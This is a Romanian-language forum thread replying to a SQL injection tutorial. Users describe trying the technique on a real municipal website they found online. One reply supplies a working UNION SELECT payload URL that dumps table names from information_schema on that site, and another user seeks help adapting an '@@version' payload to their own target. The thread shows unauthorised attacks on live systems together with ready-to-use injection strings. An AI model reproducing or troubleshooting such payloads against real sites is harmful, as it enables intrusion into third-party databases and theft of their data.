Jump to content
ZeroCold

[Tutorial]Sql injection

Recommended Posts

@ZeroCold: Referitor la tutorialul tau,am luat un site gasit pe net am urmat pasii de mai sus,toate bune si frumoase pana la aflarea tabelelor "http://www.primariapades.ro/index.php?page=-1%20union%20all%20select%201,2,3,4,table_name,6%20from%20information_schema.tables--" i-mi da o eroare si nu arate numele tabelelor. Mersi anticipat! :)

http://www.primariapades.ro/index.php?page=1+and+1=2+union+all+select+1,2,3,4,group_concat%28convert%28table_name%20using%20latin1%29%29,6+from+information_schema.tables--

....

Link to comment
Share on other sites

Sunt foarte multi copii care cred ca daca dau copy/paste in browser la o sintaxa sql gata sunt 'hackers'. Asa cum a zis cineva mai devreme e foarte important sa fi creativ si sa intelegi cu adevarat ce inseamna o baza de date si cum extragi datele din ea cel mai simplu si cel mai eficient

Link to comment
Share on other sites

M-am blocat la aflarea versiunii. Am reusit sa aflu numarul de coloane si coloana vulnerabila. In cazul meu, site-ul are 6 coloane , iar coloana vulnerabila e 4. Si care-i problema? Pai introduc sintaxa asta "union all select 1,@@version,3,4-- " dar nu inteleg ce ar trebuie sa modific sa introduc numarul meu de coloane sau coloana vulnerabila. Adica in sintaxa asta, ce este acel "1" , "3", "4" .. numarul de coloane, versiunea sau ce? Astept raspuns :D

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...